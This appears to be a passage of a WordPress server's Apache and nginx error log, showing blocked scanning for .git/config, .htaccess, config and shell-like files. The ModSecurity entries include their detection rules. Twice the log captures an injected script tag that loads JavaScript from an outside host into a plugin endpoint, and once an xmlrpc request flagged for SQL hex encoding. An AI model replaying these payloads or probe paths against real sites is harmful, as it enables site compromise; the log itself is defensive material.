6899:tid 139916377798400] [client 150.136.112.62:51048] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:19:38.582290 2025] [autoindex:error] [pid 6899:tid 139916591408896] [client 150.136.112.62:51052] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:19:44.064921 2025] [:error] [pid 5569:tid 139916444940032] [client 150.136.112.62:51068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Jan 26 02:19:44.082907 2025] [:error] [pid 6368:tid 139916419761920] [client 150.136.112.62:51070] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Jan 26 02:20:37.504807 2025] [:error] [pid 6369:tid 139916369405696] [client 150.136.112.62:51188] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Jan 26 02:20:53.419694 2025] [:error] [pid 6899:tid 139916444940032] [client 150.136.112.62:51224] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:20:53.429936 2025] [:error] [pid 6370:tid 139916386191104] [client 150.136.112.62:51226] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:21:35.715700 2025] [autoindex:error] [pid 6899:tid 139916436547328] [client 150.136.112.62:51316] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:21:45.125374 2025] [:error] [pid 6899:tid 139916566230784] [client 150.136.112.62:51342] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:21:45.948793 2025] [autoindex:error] [pid 5661:tid 139916327442176] [client 150.136.112.62:51348] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:21:46.858511 2025] [autoindex:error] [pid 5661:tid 139916411369216] [client 150.136.112.62:51354] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:21:53.857554 2025] [:error] [pid 6899:tid 139916574623488] [client 150.136.112.62:51374] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Jan 26 02:21:53.869268 2025] [:error] [pid 5511:tid 139916436547328] [client 150.136.112.62:51376] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2025/01/26 11:07:29 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/26 11:07:29 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.svn/entries HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/26 11:07:30 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.hg/hgrc HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/26 11:07:30 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.bzr/branch/format HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/26 11:07:40 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.htpasswd HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/26 11:07:40 [error] 17189#17189: *69996 access forbidden by rule, client: 193.41.206.176, server: cpanel.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 26 14:52:41.316200 2025] [:error] [pid 17225:tid 140430792451840] [client 82.102.18.182:36440] [client 82.102.18.182] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z5aSiQu0P4x3BJasFiNpqAAAAAc"] [Sun Jan 26 16:48:58.463947 2025] [:error] [pid 17225:tid 140430800844544] [client 179.43.191.19:37658] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Z5atygu0P4x3BJasFiNp3QAAAAY"], referer: https://investigacionperu.com [Sun Jan 26 18:20:08.355300 2025] [autoindex:error] [pid 17929:tid 140430895122176] [client 212.30.36.191:38976] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 18:20:13.551776 2025] [autoindex:error] [pid 17227:tid 140430700132096] [client 212.30.36.210:38984] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 18:20:17.736151 2025] [autoindex:error] [pid 17227:tid 140430758881024] [client 212.30.36.174:38988] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 18:20:20.712653 2025] [autoindex:error] [pid 17929:tid 140430658168576] [client 212.30.36.174:38992] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 18:20:30.240118 2025] [:error] [pid 17929:tid 140430903514880] [client 212.30.36.215:38998] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/index.php:17 [Sun Jan 26 18:20:30.240252 2025] [:error] [pid 17929:tid 140430903514880] [client 212.30.36.215:38998] Stack trace: [Sun Jan 26 18:20:30.240271 2025] [:error] [pid 17929:tid 140430903514880] [client 212.30.36.215:38998] #0 {main} [Sun Jan 26 18:20:30.240411 2025] [:error] [pid 17929:tid 140430903514880] [client 212.30.36.215:38998] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/index.php on line 17 [Sun Jan 26 18:20:40.002260 2025] [autoindex:error] [pid 17227:tid 140430886729472] [client 212.30.36.173:39012] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 19:31:28.985736 2025] [:error] [pid 17226:tid 140430792451840] [client 170.39.218.109:40190] [client 170.39.218.109] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/httpd.conf"] [unique_id "Z5bT4F3CuqqxEFSozZjYMgAAAEc"] [Sun Jan 26 19:31:49.790057 2025] [:error] [pid 17226:tid 140430742095616] [client 170.39.218.109:40240] [client 170.39.218.109] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config/php.ini"] [unique_id "Z5bT9V3CuqqxEFSozZjYOgAAAE0"] 2025/01/26 19:31:54 [error] 17189#17189: *75477 access forbidden by rule, client: 170.39.218.109, server: investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "investigacionperu.com" [Sun Jan 26 19:33:06.293179 2025] [:error] [pid 17225:tid 140430895122176] [client 170.39.218.109:40344] [client 170.39.218.109] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php_errors.log"] [unique_id "Z5bUQgu0P4x3BJasFiNqVAAAAAM"] [Sun Jan 26 22:49:14.184763 2025] [:error] [pid 17929:tid 140430903514880] [client 143.244.42.72:42422] [client 143.244.42.72] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z5cCOj0nGZW3mQe326oE9AAAAMI"] [Mon Jan 27 12:59:40.354303 2025] [:error] [pid 19587:tid 139931779299072] [client 185.107.56.35:55776] [client 185.107.56.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5fJjDC5KQmSGbKXkq9GQwAAAA0"] 2025/01/27 18:27:33 [error] 19548#19548: *87188 access forbidden by rule, client: 170.39.218.109, server: mail.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "mail.investigacionperu.com" [Mon Jan 27 19:05:16.793899 2025] [:error] [pid 19588:tid 139931686979328] [client 213.136.78.38:34642] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Mon Jan 27 19:05:16.794036 2025] [:error] [pid 19588:tid 139931686979328] [client 213.136.78.38:34642] Stack trace: [Mon Jan 27 19:05:16.794057 2025] [:error] [pid 19588:tid 139931686979328] [client 213.136.78.38:34642] #0 {main} [Mon Jan 27 19:05:16.794172 2025] [:error] [pid 19588:tid 139931686979328] [client 213.136.78.38:34642] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Mon Jan 27 23:01:36.109410 2025] [authz_core:error] [pid 19587:tid 139931838048000] [client 68.183.9.16:38838] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/27 23:01:40 [error] 19548#19548: *89852 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/28 00:59:54 [error] 19547#19547: *92261 access forbidden by rule, client: 3.96.54.77, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Jan 28 01:00:07.351793 2025] [authz_core:error] [pid 23100:tid 140613798323968] [client 157.230.19.140:42826] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/28 01:00:13 [error] 19547#19547: *92292 access forbidden by rule, client: 157.230.19.140, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/28 01:47:38 [error] 19548#19548: *93031 access forbidden by rule, client: 3.96.54.77, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 29 03:16:10.489751 2025] [autoindex:error] [pid 3703:tid 140593908922112] [client 213.136.78.38:48540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jan 29 10:06:33.008892 2025] [:error] [pid 28448:tid 140240463255296] [client 179.43.191.19:57580] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Z5pD-WBL9VdPsv4RQW15ZwAAAJg"], referer: https://investigacionperu.com 2025/01/29 10:22:52 [error] 28410#28410: *114393 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:53 [error] 28411#28411: *114394 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:53 [error] 28411#28411: *114395 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /conf/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:54 [error] 28410#28410: *114396 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:55 [error] 28411#28411: *114397 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /wp-admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:55 [error] 28410#28410: *114398 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /library/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:56 [error] 28411#28411: *114399 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /new/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:57 [error] 28410#28410: *114400 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:57 [error] 28410#28410: *114401 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:58 [error] 28410#28410: *114402 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:59 [error] 28411#28411: *114403 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /old/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:22:59 [error] 28410#28410: *114404 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /local/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:00 [error] 28411#28411: *114405 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:01 [error] 28410#28410: *114406 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /crm/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:01 [error] 28411#28411: *114407 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:02 [error] 28411#28411: *114408 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /laravel/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:03 [error] 28410#28410: *114409 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:03 [error] 28410#28410: *114410 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /app/config/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:04 [error] 28411#28411: *114411 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /apps/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:05 [error] 28411#28411: *114412 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /audio/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:05 [error] 28411#28411: *114413 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /cgi-bin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:06 [error] 28411#28411: *114414 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:07 [error] 28411#28411: *114415 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:07 [error] 28410#28410: *114416 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /base/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:08 [error] 28410#28410: *114417 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:09 [error] 28410#28410: *114418 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /cronlab/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:09 [error] 28410#28410: *114419 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:10 [error] 28410#28410: *114420 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /vendor/laravel/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:11 [error] 28410#28410: *114422 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /storage/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:11 [error] 28411#28411: *114423 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /protected/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:12 [error] 28411#28411: *114424 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /pos/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:13 [error] 28410#28410: *114425 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /newsite/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:13 [error] 28410#28410: *114426 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:14 [error] 28411#28411: *114427 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /sites/all/libraries/mailchimp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:15 [error] 28411#28411: *114428 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /sites/default/libraries/mailchimp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:15 [error] 28410#28410: *114429 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /mailchimp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:16 [error] 28410#28410: *114430 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:17 [error] 28410#28410: *114431 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:17 [error] 28411#28411: *114432 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /OTApp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:18 [error] 28410#28410: *114433 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /application/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:19 [error] 28410#28410: *114434 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /tokenlite_app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:19 [error] 28411#28411: *114435 access forbidden by rule, client: 165.22.24.70, server: investigacionperu.com, request: "GET /tokenlite/tokenlite_app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/29 10:23:20 [error] 28410#28410: *114436 access forbidden by rule, client: 165.22.24.70, 